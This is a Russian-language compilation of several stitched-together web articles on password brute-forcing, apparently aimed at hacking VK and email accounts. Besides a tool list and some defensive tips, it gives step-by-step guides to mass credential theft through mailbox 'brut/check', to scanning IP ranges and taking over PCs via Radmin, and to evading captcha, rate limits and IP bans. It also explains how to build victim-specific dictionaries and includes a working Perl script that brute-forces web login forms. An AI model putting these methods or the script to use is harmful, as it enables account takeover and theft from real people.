Брутфорс перебор паролей. Лучшие инструменты пен-тестера: брутфорс паролей Автоматический перебор паролей

Недавно мы опубликовали статью о надежности паролей, а также паролях, которые используются многими пользователями. Большинство людей используют слабые пароли. Но как убедится, что ваш пароль сильный? Взлом паролей - это неотъемлемая часть цифровой криминалистики и тестирования информационной безопасности.

В этой статье мы собрали лучшие программы для взлома паролей, которые могут использоваться системными администраторами для проверки надежности их паролей. Все утилиты используют различные алгоритмы и применимы к различным ситуациям. Рассмотрим сначала базовую информацию, которая поможет вам понять с чем мы будем иметь дело.

В области кибербезопасности и криптографии взлом паролей играет очень важную роль. Это процесс восстановления пароля с целью нарушения или восстановления безопасности компьютера или системы. Итак, почему вам нужно узнать программы перебора паролей? В мирных целях можно использовать взлом паролей для восстановления забытых паролей от онлайн аккаунтов, также это используется системными администраторами для профилактики на регулярной основе.

Для взлома паролей в большинстве случаев используется перебор. Программное обеспечение генерирует различные варианты паролей и сообщает если был найден правильный. В некоторых случаях персональный компьютер способен выдавать миллионы вариантов в секунду. Программа для взлома пароля на пк проверяет все варианты и находит реальный пароль.

Время, необходимое для взлома пароля пропорционально длине и сложности этого пароля. Поэтому рекомендуется использовать сложные пароли, которые трудно угадать или подобрать. Также скорость перебора зависит от криптографической функции, которая применяется для генерации хэшей пароля. Поэтому для шифрования пароля лучше использовать Bcrypt, а не MD5 или SHA.

Вот основные способы перебора пароля, которые используются злоумышленниками:

• Атака по словарю - для атаки используется файл, который содержит список слов. Программа проверяет каждое из слов, чтобы найти результат;
• Атака Bruteforce - можно не использовать словарь, а перебирать все комбинации заданных символов;
• Атака с помощью радужных таблиц - в атаке используются предварительно вычисленные хэши, поэтому она быстрее.

Есть и другие методы взлома паролей, основанные на социальной инженерии, но сегодня мы остановимся только на атаках без участия пользователя. Чтобы защититься от таких атак нужно использовать только сложные пароли. А теперь рассмотрим лучшие инструменты для взлома паролей 2017. Этот список опубликован только для ознакомительных целей и мы ни в коем случае не призываем взламывать чужие личные данные.

Лучшие программы для перебора паролей

1. John the Ripper

John the Ripper - это один из самых популярный инструментов для перебора паролей, доступных абсолютно всем. Он распространяется с открытым исходным кодом и написан на языке программирования Си. Здесь собраны различные методы перебора паролей.

Программа способна перебирать пароли по сохраненному хэшу, и поддерживает различные алгоритмы хэширования, в том числе есть автоматическое определение алгоритма. John the Ripper относиться к набору инструментов для тестирования безопасности от Rapid7. Кроме Linux поддерживается Windows и MacOS.

2. Aircrack-ng

Aircrack-ng - это набор программ для взлома и перехвата паролей от wifi сетей. Программа - одна из лучших, которые используются хакерами. Здесь есть все необходимое для взлома WEP и WPA шифрования, начиная от перехвата хэша, и до получения готового пароля.

Особенно легко поддается взлому шифрование WEP, для преодоления защиты существуют атаки PMS и PTW, с помощью которых можно взломать этот протокол в считаные минуты при достаточном потоке трафика через сеть. Поэтому всегда используйте WPA2 чтобы быть в безопасности. Тоже поддерживаются все три платформы: Linux, Windows, MacOS.

3. RainbowCrack

Как следует из названия, RainbowCrack использует радужные таблицы для взлома хэшей паролей. С помощью уже готовых таблиц утилита очень сильно уменьшает время взлома. Кроме того, есть как графический интерфейс, так и утилиты командной строки.

После завершения этапа предварительных вычислений этот инструмент работает в сотни раз быстрее чем при обычном переборе. Вам не нужно самим создавать таблицы, разработчики уже создали их для LM, NTLM, MD5 и SHA1. Все доступно бесплатно.

Еще один важный момент - это ускорение с помощью GPU. С помощью использования видеокарты вы можете снизить время вычисление пароля еще на несколько порядков. Поддерживаются платформы Windows и Linux.

4. THC Hydra

В отличие от выше перечисленных программ, Hydra работает по-другому. Она не вычисляет хэши. Вместо этого, программа выполняет атаки перебора на различные сетевые протоколы. Здесь поддерживаются Astrisk, FTP, HTTP, MySQL, XMPP, Telnet, SHH и многие другие. Основная цель утилиты - атаки перебора на форму ввода пароля.

Этот инструмент помогает исследователям безопасности узнать насколько легко можно получить доступ к удаленной системе. Для расширения функций можно добавлять модули, поддерживается Linux, Windows, Solaris, FreeBSD и MacOS.

5. HashCat

По заявлениям разработчиков - это самый быстрый инструмент для перебора паролей. Он распространяется в качестве свободного программного обеспечения и поддерживает такие алгоритмы: md4, md5, LM, SHA, MySQL, Cisco PIX и Unix Crypt.

Есть версии инструмента для перебора на CPU, а также взлома на основе GPU - oclHashcat и cudaHashcat. Кроме стандартной атаки Bruteforce, поддерживаются атаки по словарю, гибридные атаки по самые, по таблицам, Prince и так далее. Из платформ поддерживаются Windows, Linux и MacOS.

6. Crowbar

Crowbar - это популярный инструмент для тестирования безопасности паролей. Другие программы перебора паролей используют логины и пароли пользователей, но crowbar позволяет перебирать ключи SSH.

Этот инструмент с открытым исходным кодом создан для работы с протоколами, которые редко поддерживаются другими программами. Сейчас поддерживается VNC, OpenVPN, SSP, NLA. Программа может работать на Linux, Windows и MacOS.

7. coWPAtty

Это реализация утилиты для перебора пароля от WPA/WPA2 PSK на основе словаря или радужных таблиц. Использование радужных таблиц очень сильно ускоряет работу утилиты. Стандарт PSK используется сейчас очень часто. Радует только то, что перебрать пароль очень сложно, если он был изначально выбран правильным.

В статье приводится список, который включает лучшие программы для взлома паролей, работающие в различных типах операционных систем. Описываются, в числе других, такие программы как Aircrack, John the Ripper и THC Hydra – все они используют различные алгоритмы и протоколы, которые теоретически способны взломать различные по сложности пароли в ОС Линукс, WIndows и OS X. Описание ограничено простым перечислением для ознакомительного экскурса. В списке лишь те, что работают на платформах Windows и Linux.

Что нужно знать непрофессионалу (к коим себя причисляет и автор статьи) о процессе взлома? Некоторые вещи нужно уяснить до того, как приступить к процедуре “восстановления забытого” или изыманию из перехваченных пакетов паролей:

Вопрос “сколько требуется времени на взлом пароля?” в такой форме вскрывает в вас дилетанта. Он равнозначен вопросу сколько времени потребуется, чтобы добраться от Москвы до Владивостока? Пешком? На самолёте? Через Китай? Хотя ответ есть: от 1 секунды до 100 000 лет. Если взять расшифровку через “рукопожатие”, работающий aircrack-ng дал мне комбинацию лишь единожды:

• через неделю работы…
• на двухъядерном ноуте со встроенной GPU и 4 Гб ОЗУ…
• при всём том, что пароль включал в себя 8 ТОЛЬКО цифровых символов

John the Ripper , запущенный на той же машине, не справился за 5 дней. Старичок десктоп с 4 -мя Intel-скими 2,8 ГГц ядрами на борту, 6 Гб оперативы и Nvidia 660Ti разобрался с хендшейком за …, вобщем, я даже из-за стола встать не успел, как увидел пароль. Можно быстрее и работая с гораздо большими объёмами, но отдавать более половины от дохода за GTX 980 вообще не прикалывает…

И причиной тому не программы. А значит, имея под рукой слабую hardware-сборку, не рассчитывайте на серьёзный результат.

Взлом паролей. Какие методики существуют?

Подобраться к цели возможно несколькими путями. Среди них:

• атака по словарю (хакер использует специальный файл с готовым списком символьных комбинаций, которые программа и подбирает)
• атака брутфорс (парольные комбинации генерируются программой)
• атака по радужной таблице (взлом хешей допустимых паролей, вводимых пользователем)

Приводимые здесь программы используют различные варианты атаки и ранжируются в произвольном, выбранном автором порядке. Описание работы с программами появится в соответствующих ссылках в соответствующих абзацах.

Программы для взлома паролей: John the Ripper

John the Ripper – пожалуй, самая популярная из подобных в своём роде. Преимущественный язык программирования – С. Программа бесплатна (в урезанной версии), включает в себя несколько подходов к процессу взлома. Возможность определять автоматически типы хешей паролей ставит её на первое место среди инструментов этичного хакинга. Как и другой инструмент взлома Metasploit , принадлежит к семейству инструментов безопасности семейства Raspid7 .

Поддерживаемые платформы: Linux, Windows, Android, DOS и OS X

Программы для взлома паролей: OphCrack

Наиболее частое применение программа нашла среди любителей взлома пароля к учётной записи Windows. Также как и RainbowCrack, OphCrack работает с радужными таблицами с целью извлечения заветных комбинаций из парольных хешей. Именно благодаря возможности доставать пароли различных форматов из различных источников системы, программа OphCrack известна возможностью взломать пароль Windows за считанные мгновения. При физическом доступе к компьютеру жертвы в виде Live DVD диска следов не оставляет. Поставляется в двух версиях, расширенной и бесплатной (урезаны возможности радужных таблиц Windows).

С сайта производителя

Программы для взлома паролей : L0phtCrack

Как и предыдущая, L0phtCrack известна благодаря тому, что может быстро разобраться с паролем Windows. Использует широкий набор атак (гибридную, по словарю, брутфорс, на радужные таблицы), но может применяться и для сетевого пронюхивания. По существу аналог предыдущей программы. На данный момент есть только триальная на 15 дней версия.

Поддерживаемые платформы: Windows

Скачать L0phtCrack с сайта производителя

Брутфорс (происходит от английского словосочетания: brute force) — разновидность хакерской атаки — способ взлома учётных записей в компьютерных системах, платёжных/банковских сервисах и на веб-сайтах посредством автоматизированного подбора комбинаций паролей и логинов.

Брутфорс базируется на одноимённом математическом методе (brute force), в котором правильное решение — конечное число или символьная комбинация находится посредством перебора различных вариантов. Фактически каждое значение из заданного множества потенциальных ответов (решений) проверяется на правильность.

Принцип действия брутфорса

Хакер пишет специальную программу для подбора паролей либо использует уже готовое решение своих коллег. Она может быть ориентирована на определённый почтовый сервис, сайт, соцсеть (т.е. предназначена для взлома конкретного ресурса). Далее выполняется подготовка к взлому. Она состоит из следующих этапов:

1. Составление прокси-листа

В целях скрытия истинного IP-адреса компьютера, с которого будет осуществляться атака, и для предотвращения блокировки со стороны сайта, где необходимо взломать учётную запись, выполняется настройка интернет-соединения через прокси-сервер.

Поиск адресов/портов прокси осуществляется в прокси-граббере (Proxy Grabber). Эта утилита самостоятельно извлекает все данные для подключения к серверам-посредникам из сайтов, предоставляющих прокси (они задаются в списке). Другими словами, выполняется сбор прокси.

Полученная база сохраняется в отдельный текстовый файл. А затем все адреса серверов, имеющиеся в ней, проверяются на работоспособность в прокси-чекере. Довольно часто программы, предназначенные для автоматизированной добычи прокси, совмещают в себе функции и граббера, и чекера.

В итоге, получается готовый прокси лист в виде списка IP/порт, сохранённый в файле txt. (Он понадобится при настройке программы брутфорс).

1. Поиск баз для брута

К брутфорсу необходимо подключить словарь — некое множество комбинаций паролей и логинов — которые он будет подставлять в форму для входа. Он также, как и прокси-лист, имеет вид списка в обычном текстовом файле (.txt). Словари, они же базы, распространяются через хакерские форумы, сайты и файлообменники. Более опытные «умельцы» создают их самостоятельно и предоставляют всем желающим за определённую плату. Чем больше база (количество комбинаций, логинов, аккаунтов), тем лучше (для хакера) — тем больше вероятность успеха взлома.

1. Настройка брутфорса

Загружается прокси лист; программа подбора автоматически будет менять прокси, чтобы веб-сервер не обнаружил атаку и, соответственно, источник (узел) атаки.

Подключается словарь из комбинаций пароль/логин. Устанавливается количество потоков — сколько одновременно комбинаций брутфорс будет проверять. Мощный компьютер с высокой скоростью интернета уверено справляется с 120-200 потоками (это оптимальное значение). От этой настройки напрямую зависит скорость брута. К примеру, если выставить всего 10 потоков, подбор будет выполняться очень медленно.

1. Запуск брутфорса

Успешные попытки взлома программа фиксирует: сохраняет сбрученные аккаунты (пароль/логин) в файл. Длительность процедуры подбора колеблется от нескольких часов до нескольких дней. При этом она не всегда оказывается результативной — по причине высокой криптоустойчивости данных для входа либо осуществления других защитных мер со стороны атакуемого.

Виды брутфорса

Персональный взлом

Охота за конкретным аккаунтом — в соцсети, на почтовом сервисе и т.д. Посредством либо в процессе виртуального общения злоумышленник выпытывает у жертвы логин для доступа на какой-либо сайт. Затем взламывает пароль методом подбора: указывает в брутфорс адрес веб-ресурса и добытый логин, подключает словарь.

Шансы такого взлома невелики, например, по сравнению с той же XSS-атакой. Он может увенчаться успехом, если владелец аккаунта использовал пароль из 6-7 символов с незатейливой символьной комбинацией. В противном случае на «разгадывание» более устойчивых вариантов из 12,15, 20 букв, цифр и спецсимволов понадобятся годы — десятки и сотни лет, исходя из расчётов математической формулы поиска.

Брут/чек

К брутфорсу подключается база данных с логинами/паролями от почтовых ящиков одного почтового сервиса (например, mail.ru) либо разных. И прокси лист — для маскировки узла (так как по множественным запросам с одного IP-адреса веб-сервисы электронной почты довольно быстро детектируют атаку).

В опциях брута указывается список ключевых слов (как правило, названия сайтов) — ориентиры по которым он будет искать на взломанных ящиках в письмах данные для входа (например: steampowered, worldoftanks, 4game, VK). Либо конкретный интернет-ресурс.

Пользователь, регистрируясь в онлайн-игре, соцсети или на форуме, как и полагается, указывает свой мэйл (почтовый ящик). Веб-сервис присылает сообщение на указанный адрес с данными для входа и ссылкой на подтверждения регистрации. Именно эти письма и ищет брутфорс, что выудить из них логины и пароли.

Нажимаете «СТАРТ» и программа-взломщик начинает брут. Она действует по следующему алгоритму:

1. Загружает из базы логин/пароль к мэйлу.
2. Проверяет доступ, или «чекает», (автоматически авторизуется): если удаётся в аккаунт зайти — плюсует в графе good (гуды) единицу (значит найден ещё один рабочий мэйл) и начинает его просматривать (см. следующие пункты); если доступа нет — заносит его в bad (бэды).
3. Во всех «гудах» (открытых мэйлах) брутфорс сканирует письма по заданному хакером запросу — то есть ищет логины/пароли к указанным сайтам и платёжным системам.
4. При обнаружении искомых данных — копирует их и заносит в отдельный файл.

Таким образом, совершается массовый «угон» аккаунтов — от десятков до сотен. Добытыми «трофеями» злоумышленник распоряжается уже по своему усмотрению — продажа, обмен, сбор данных, кража денег.

Удаленный взлом компьютера

Брутфорс в совокупности с другими хакерскими утилитами используется для получения удаленного доступа к запароленному ПК жертвы через интернет-канал.

Данный вид атаки состоит из следующих этапов:

1. Выполняется поиск IP-сетей, в которых будет проводиться атака на компьютеры пользователей. Диапазоны адресов берутся из специальных баз либо посредством специальных программ, например таких, как IP Geo. В ней можно выбирать IP-сети по конкретному округу, региону и даже городу.
2. Отобранные диапазоны IP и словари подбора устанавливаются в настройках брутфорса Lamescan (или его аналога), предназначенного для удалённого брута логина/пароля входа в систему. После запуска Lamescan делает следующее:

• выполняет коннект на каждый IP из заданного диапазона;
• после установления связи пытается подключиться к хосту (ПК) через порт 4899 (но могут быть и другие варианты);
• если порт открыт: пытается получить доступ к системе, при запросе пароля выполняет подбор; в случае успеха — сохраняет в своей базе IP-адрес хоста (компьютера) и данные для входа.

1. Хакер запускает утилиту Radmin, предназначенную для управления удалёнными ПК. Задаёт сетевые координаты жертвы (IP, логин и пароль) и получает полный контроль над системой — рабочий стол (отображается визуально на дисплее компьютера взломщика), файловые директории, настройки.

Программы для брута

HASHCAT

На 2020 год одна из самых мощных программ для брута. Использует более 200 алгоритмов перебора. Широко используется для подбора WPA/WPA2 паролей, а также паролей документов MS Office, PDF, 7-Zip, RAR, TrueCrypt.

Классический брутфорс, один из самых первых. Тем не менее, не теряет своей актуальности и конкурирует с новыми решениями. Имеет шустрый алгоритм перебора и поддерживает все основные интернет-протоколы — TCP/IP, POP3, HTTP и др. Умеет подделывать куки. Брутит по словарю и генерирует пароли самостоятельно.

Мощный брут- чекер. Оснащён расширенным арсеналом функций по работе с базами (проверка, сортировка по доменам). Поддерживает различные типы прокси, проверяет их работоспособность. Выполняет сканирование писем в ящиках по таким настройкам, как дата, ключевое слово, адрес, непрочитанные сообщения. Может скачивать письма с Mail.ru и Yandex.

Брутфорс - грубая сила, взлом перебором
В статье " " было сказано, что взломать вк брутфорсом (программой) - невозможно.
Это не совсем так, лазейки всё таки-есть…
Ниже будет приведен рабочий скрипт, но сначала…

Внизу статьи - бесплатная прога для генерирования брут словаря и листинг "топ лоховских паролей"

Заранее делаю оговорку, что речь идет о классическом «переборе» без всяких алгоритмов PBKDF2 , без разбора хэширования sha , т.к. на бытовом уровне это неподъемная задача.

В сети гуляют множество программ «для взлома ВК перебором (брутом)»

Какую выбрать? Какая поможет (без вреда мне же)?
- Никакая

Каждый аккаунт ВК требует персонального подхода и шаблонные проги из сети -это всё лажа, развод, фуфло.

Сейчас сами поймете почему. Мат.часть кратко.

Минимальная длина пароля ВК - 6 символов.

Пароль обязательно должен содержать:
цифры (0-9 - 10 вариантов),
буквы (a-z - 26 в латинице),
заглавные буквы (A-Z - тоже 26)

Итого на каждый символ - 10+26+26=62 (!) варианта, поэтому количество комбинаций для:
6-и символьного пароля - 56 800 235 584 (56,8 миллиардов)
7-и символьного пароля - 3 521 614 606 208 (3,5 триллионов)
8-и символьного пароля - 218 340 105 584 896 (218 триллионов)
9-и символьного пароля -13 537 086 546 263 600 (ХЗ как это называется))))

Длину пароля мы не знаем, поэтому брутить придется диапазон хотя бы из 6-8 символов
Итого: 6+7+8 символов = 221 918 520 426 688 (222 триллиона) вариантов

Допустим у вас достаточно хороший комп, но возникает вопрос - сколько запросов к серверу ВК он сможет сделать?
Какая скорость перебора у домашнего компа?

Подсчитаем . Для этого откроем командную строку (Пуск - стандартные-Командная строка или запустим процесс cmd.exe)
Вбиваем команду , получаем ответ сервера

«Ответ от …..время 134мс» (это у меня, у вас время может отличаться)

Время пинга - это время за которое сигнал идет от нашей машины до сервака и обратно

В одной секунде 1000 миллисекунд (мс), поэтому
Скорость брута с вашей машины (запросов/сек) будет = 1000/время ответа
В моём случае 1000/134мс = 7,4 запроса (пароля) в секунду

Сколько же времени займет перебор паролей для ВК?

Напомню, что мы перебираем 221 918 520 426 688 (222 триллиона) вариантов пароля.

Поэтому, чтоб узнать сколько мы будем взламывать пароль ВК перебором делим количество на скорость, т.е.

221918520426688 пароля / 7,4 пароля в секунду = 29737081737176сек = 495618028953 мин = 8260300483 часов = 344179187 дней = 942957 лет

Вывод: реальная программа для взлома ВК могла бы подобрать пароль перебором за 94 тысячи лет.

Вопрос: А как же видео на ютюбе, в которых чудо-проги брутят страницу ВК за несколько минут/часов?
Отвечаю: Это развод созданный с целью заражения вашего компа для кражи ваших же данных. Не больше - не меньше.

Можно значительно ускорить процесс перебора!
Для этого нужно:
1. Повысить вычислительную мощность. Например, заразить 1.000.000 чужих компов и со всех одновременно брутить ВК (аж смешно)
2. Укоротить брут-словарь до, например, пары тыщ.(по принципу социальной инженерии)

Как сделать брут-словарь?
1. Ручками в программе блокнот (notepad.exe)
2. Прогой «генератор брута» (ссылка внизу статьи)

Этот брут - словарь наполняем реальными вариантами.

Реальные - это такие, которые хоть как-то связано с взламываемым человеком:

- телефоны (его, его родственников, друзей)
Пример - номера с +7с, 8кой, без 8ки - попадается редко

- даты рождения (его, его родственников, близких)
Пример - (одной и той же даты) 010118, 01012018, 20180101, 180101 - попадается часто

- Имена любимых, близких
Пример - SashaMaria, MariaIvanova, SaNoMaIv - попадается средне

Название сайта (или фамилия) на другой раскладке
Пример , если набрать слово «vkontakte» на русской раскладке, то получится - «млщтефлеу» - такая схема ну очень часто попадается на всех сайтах.

- лоховской список паролей для брута (список самых распространенных паролей в сети - ссылка в конце статьи)

Долго ли писать словарь? Ну, не очень - полчаса за глаза хватит. А кто сказал что будет легко?))

Допустим у нас есть созданный брут словарь и рабочая прога для подбора пароля ВК (либо ручной ввод по словарю).

Возникает одна важная проблема - система защиты сервера.

Собственно помеха её заключается в том, что при слишком частых запросах сервер тупо блокирует (временно) ваш IP. Кроме того, если вы работаете с ВК через стандартную форму ввода (HTML\FORM), то после 3 ей неудачной попытки ВК будет просить ввести капчу.

В старой версии ВК можно было просто перейти на мобильную версию - m.vk.com, теперь же мобильной версии как таковой нет - в 2016 году сделали единый адаптивный дизайн.

Как обойти капчу Вконтакте?

ВК требует ввод капчи после 3 неудачной попытки (перезагрузка F5 не помогает), а как он узнает что это именно вы делаете несколько попыток входа?

По IP
- по кукам (cookies), кэшу и JavaScript

С куками, кэшем и JavaScript нет проблем - их можно просто отключить в настройках браузера.

IP можно менять установив прогу по смене IP - в этом нет ничего мудреного, в сети их полно (Гугл в помощь)

Можно пользоваться браузером TOR (кто не знает - это браузер для анонимного гуляния по сети, он же меняет IP-шники при каждой новой сессии, полезная штука особенно для тех кто сёрфит или работает в САР)

Но почти полностью сводит на нет все попытки перебора ГЕОлокация.

Сервер ВК запоминает откуда (географически) был произведен последний вход.

И если ваш IP из другого населенного пункта, то (возможно) будет выскакивать надпись:

"Вы пытаетесь зайти под именем Ивана Иванова из необычного места."

Чтобы подтвердить, что Вы действительно являетесь владельцем страницы, пожалуйста, укажите все недостающие цифры номера телефона, к которому привязана страница.

Скрипт для брута web-форм (типа, Прога для взлома ВК)

Важно! На сервере ВК стоит скрипт отслеживающий частоту отправки пакетов, т.е. если вы будете долбить со скоростью N раз/сек - вас автоматически отправят в бан лист по IP.
Также ВК использует ГЕОслежение.

Без динамического IP брутить не стоит и пытаться, может помочь VPN.
Лично я считаю перебор паролей ВК делом малоперспективным, но для ценителей выложу старенький скрипт на Перл’е, позаимствованный у 5p4x2knet a.k.a. Apocalyptic"s и немного пофиксеный.

Скрипт работает методом POST только по двум параметрам - login и пароль .

Если логин известен (например, номер телефона), то соответствующие поля просто заполните значением без обращения к словарю.

Скрытые поля - капчу, картинки скрипт не передаст, скрывайте источник запросов (себя) как описано выше.

Тут нам пригодится вменяемый брут-словарь, который мы составляли в начале статьи. (назовем его, к примеру, brut.txt )

Также нужен файл, из которого наша программа будет получать информацию.

Программа будет вести брутфорс всех скриптов указанных в этом файле.(infa.txt ). Если скрипт один, то можно заменить

Естественно, файл для записи результатов (result.txt )

Итак,
{
#подключаем объект
$usagent = LWP::UserAgent
#открываем файл с информацией (если не можем его открыть то выходим);
# скидываем файл в массив @infa и закрываем. (если скрипт один, то его можно сразу указать)
open(INFA, ";
close(INFA);
#открываем брут-словарь
open(BRUT, ";
close(BRUT);
#открытие файла с результатами (дописывает в конец).
open(RESULT, ">>$ARGV");
#начало цикла
foreach $name (@infa)
{
#отделяем URL, login, переменные и инфу об ошибках
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#показываем URL
print "$url...n";
#запуск ещё одного цикла
foreach $brut (@brut)
{
#убиваем пробелы и переводы строк
$pss =~ s/ //;
$pss =~ s/n//;
#подключаем новый объект
$usagent = LWP::UserAgent->new();
#создание запросов.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");
#и егоотправка
$result = $usagent -> request($req);
#запись результатов в переменную
$res = $result->content;
#если не получилось формируется сообщение об ошибке
if($res!~ /$failed/i)
{
#вывод сообщения с паролем; запись в результы;
print "brutword found. It isn$pssnn";
print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn";
#иначе продолжение подбора
last;
}
}
}
#закрытие файла result.txt
close(RESULT);

Частое явление в Интернете. Проводится он с разными целями. Самая частая цель – рассылка спама и навязчивой рекламы. Иногда взломщики проводят хищение денежных средств с аккаунтов в социальных сетях. Опасен взлом платежных систем. Взлом пароля электронной почты, кроме рассылки спама, несет опасность того, что все остальные данные аккаунтов так же могут быть узнаны. Иногда проводится с целью хищения игрового контента.

Для защиты своих данных используйте сложные пароли

Методы взлома паролей

Даже лучшие пароли для почты можно взломать. Способы, которыми действуют хакеры, совершенствуются с каждым днем. Это специальные программы для подбора сочетаний, методы отслеживания действий в Интернете и др.

Фишинг

Этот способ узнать пароль от ВК или другой социальной сети популярен у хакеров. Пользователю присылается сообщение, предлагающее перейти на сайт, который похож на тот, что хакер пытается взломать. Обычно, он полностью с него скопирован.

Перейдя по ссылке, пользователь вводит другие данные, думая, что пытается зайти в свой привычный аккаунт. Можно попасть на такой сайт и пытаясь узнать пароль, имея логин, то есть воспользовавшись функцией «Восстановление учетной записи».

Пользователь нажимает кнопку «Вход» и данные моментально попадают к злоумышленникам. Сам же юзер перенаправляется на страницу настоящей социальной сети, даже не замечая, что произошло. Развитая социальная инженерия позволяет хакерам узнать пароль от контакта другого человека.

Ведь для того, чтобы пользователь перешел по поддельной ссылке, необходимо «втереться» к нему в доверие. Метод не слишком эффективный, но простой в осуществлении. Однако владелец аккаунта может заподозрить, настоящая, зачастую, мало отличаются) и отказаться от перехода. Злоумышленника же можно легко найти.

При вводе пароля обратите внимание на адрес сайта: часто злоумышленники делают адрес поддельного сайта похожим на сайт оригинал

Подбор

Основная технология, по которой хакеры пытаются узнать пароль почты методом подбора – БрутФорс. Это метод автоматизированной подстановки генерации и подстановки комбинаций для аккаунта. Для запуска такого подбора нужна специальная программа, взлом пароля которой будет быстрым. Действует такая программа по математическому принципу, где правильное решение узнается методом подбора.

Таким образом, программа бесконечно генерирует комбинации цифр и букв и проверяет их на правильность. За счет высокой производительности, такие программы работают довольно быстро.

Хакерский сервис для взлома может быть, как универсальным, так и для конкретного сайта. При ее работе создается фальшивый прокси, благодаря которому злоумышленники могут скрыть свой айпи. Кроме того, путем регулярной его смены удается избегать блокировки компьютера, с которого производится взлом. После его взлома, Вы, зайдя в аккаунт, увидите сообщение о том, что Ваш пароль был скомпрометирован. Необходимо срочно сделать следующее:

1. Поменять данные учетной записи;
2. Изменить контрольный вопрос;
3. Написать в Администрацию о том, что был скомпрометирован пароль в Контакте (или на другом ресурсе).

Хотя раньше и применялись программы, действующие по , сейчас появились более совершенные. Теперь подстановка к слову цифры не сделает Ваш аккаунт защищенным. Новые программы подбирают совершенно произвольные буквенно – цифровые комбинации, ими можно взломать очень сложное сочетание символов.

Взлом пароля социальной сети ВКонтакте путем перебора

Хэши и взлом сайтов

Действенный, но сложный метод взлома. Чтобы узнать пароль, хакеры взламывают сайт, на котором хранятся хэши кодовых комбинаций пользователей. Хэш получается после того, как комбинация букв подверглась необратимой сложной процедуре. Когда, входя в учетную запись, Вы вводите сочетание знаков, хэш рассчитывается снова и если совпадает с сохраненным, то Вы ввели кодовое слово верно. Эти данные и похищают злоумышленники, взламывая сайт. Еще проще это со старыми ресурсами, которые хранят не хэши, а сами буквенные комбинации.

Хэш расшифровать не так уж сложно. Хакеры имеют множество программ и сервисов, которые позволяют узнать и использовать их. Они могут посмотреть, пароль в Яндекс Почте, предварительно взломав сам сервис, следующим образом:

• Вычисление алгоритмов хеширования и расшифровка данных;
• Имея базу кодовых комбинаций БрутФорс, хакер так же имеет и хеши этих слов, закодированные тем или иным алгоритмом. Программе остается только сравнить имеющиеся с новыми;
• Алгоритмов не так много, и они распространены.

Хеширование на сайтах – процесс, аналогичный работе кукисов на ПК. Расшифровать его так же просто, как узнать пароль из cookies. Потому очевидно, что такое хранение не является надежной защитой аккаунта даже при очень сложной комбинации.

Взлом пароля путем подбора из словаря

Программы – шпионы

Программы – шпионы – ПО, устанавливаемое на ПК срыто. Так, что пользователь не знает о его существовании. По сути своей это вирус. Предназначены для сбора информации о пользователе, логинов, истории запросов браузера, кодовых слов и т.п. Необходимы для взлома и для ведения целевой рекламы. С помощью таких программ информация передается напрямую злоумышленнику.

Такие программы маскируются под ПО, предлагающее скопировать пароль в виде звездочек или восстановить из кукисов. Использовать такие программы нужно осторожно. А лучше воспользоваться браузером для такого восстановления возможности входа в учетную запись. С помощью программ – шпионов можно узнать пароль друга, установив вредоносное ПО на его телефон или компьютер. В этом случае данные будут передаваться Вам.

Программа шпион не взламывает пароль, она его просто ворует и отсылает злоумышленнику

Взламывали ли пароль?

Некоторые ресурсы показывают уведомления о взломе сами. Социальная сеть ВКонтакте выдает уведомление, что скомпрометирован пароль при входе в учетную запись. Если Вы меняете кодовое слово на старое, может появиться такое уведомление, так как сайт хранит черный список паролей, с которых велась рассылка спама и т.п.

Окно-сообщение, предупреждающее пользователя о том, что его аккаунт взломан

Кроме того, есть ряд онлайн сервисов, на которых представлены учетные записи, которые попадали в руки к злоумышленникам в последнее время. Если имеются причины полагать, что пытались взломать пароль электронной почты, то введите в поле адрес почты (или логин, если речь идет не о почтовых ящиках) и Вы увидите, не взламывали ли аккаунт.

Узнать, взламывали ли аккаунт можно и иными способами. Главный из них – анализ активности в аккаунте во время Вашего отсутствия на сайте.

ПОСМОТРЕТЬ ВИДЕО

Если друзьям приходили сообщения рекламного содержания или приглашающие на сторонние сайты, Вы видите сообщения и уведомления впервые, хотя сайт показывает, что они просмотрены и т.п. то Вашей страницей пользовались в отсутствие. При этом она могла и не быть видна онлайн. Есть программы для скрытия присутствия пользователей в сети.